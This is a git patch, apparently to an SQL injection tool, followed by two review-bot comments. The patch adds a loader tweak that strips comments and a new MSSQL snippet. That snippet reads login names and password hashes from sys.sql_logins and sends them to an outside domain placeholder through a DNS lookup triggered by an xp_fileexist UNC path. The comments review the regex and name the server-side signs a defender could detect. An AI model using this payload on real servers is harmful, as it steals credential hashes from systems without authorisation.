From bf923a97df8bb35eb841a9888c741a344b8885a9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 15 Feb 2012 13:45:10 +0000
Subject: [PATCH] minor update
---
 lib/core/common.py | 2 ++
 procs/mssql_dns_request.txt | 5 +++++
 2 files changed, 7 insertions(+)
 create mode 100644 procs/mssql_dns_request.txt
diff --git a/lib/core/common.py b/lib/core/common.py
index d899d3e1d..c51d9ebe8 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1816,6 +1816,8 @@ def getSPLSnippet(name, **variables):
 checkFile(filename)
 retVal = readCachedFileContent(filename)
+ retVal = re.sub(r"#.+", "", retVal)
+
 for _ in variables.keys():
 retVal = re.sub(r"%%%s%%" % _, variables[_], retVal, flags=re.I)
diff --git a/procs/mssql_dns_request.txt b/procs/mssql_dns_request.txt
new file mode 100644
index 000000000..b46f6bac9
--- /dev/null
+++ b/procs/mssql_dns_request.txt
@@ -0,0 +1,5 @@
+# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf
+
+DECLARE @host varchar(1024);
+SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
+EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
\ No newline at end of file
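Review bot: The added `re.sub(r"#.+", "", retVal)` is not anchored to the start of a line, so it deletes everything from the first `#` on any line of a snippet, not only whole-line comments. A `#` inside a quoted string or a `#temp` table name in a later procs file would be silently truncated before the placeholders are substituted. Anchoring it, for example `retVal = re.sub(r"(?m)^[ \t]*#.*$", "", retVal)`, limits the strip to comment lines, which is the only form the new procs file uses, and also covers a bare `#` line that `.+` leaves behind. A one-line comment above it such as `# drop '#' comment lines from the snippet` would record the intent. getSPLSnippet begins and ends outside this hunk.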
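Review bot: The header comment in the new file gives only the reference and does not document the `%DOMAIN%` placeholder or the fact that `#` lines are removed by getSPLSnippet before the text is used. I would add a second comment line such as `# %DOMAIN% is replaced by getSPLSnippet(); lines starting with '#' are stripped there`. For readers using this file as a detection reference, the observable pieces on the server side are the read of `password_hash` from `sys.sql_logins` and the `xp_fileexist` call whose argument is built from `@host`. Judging by the file name, the latter is meant to cause an outbound name lookup. The file also ends without a trailing newline.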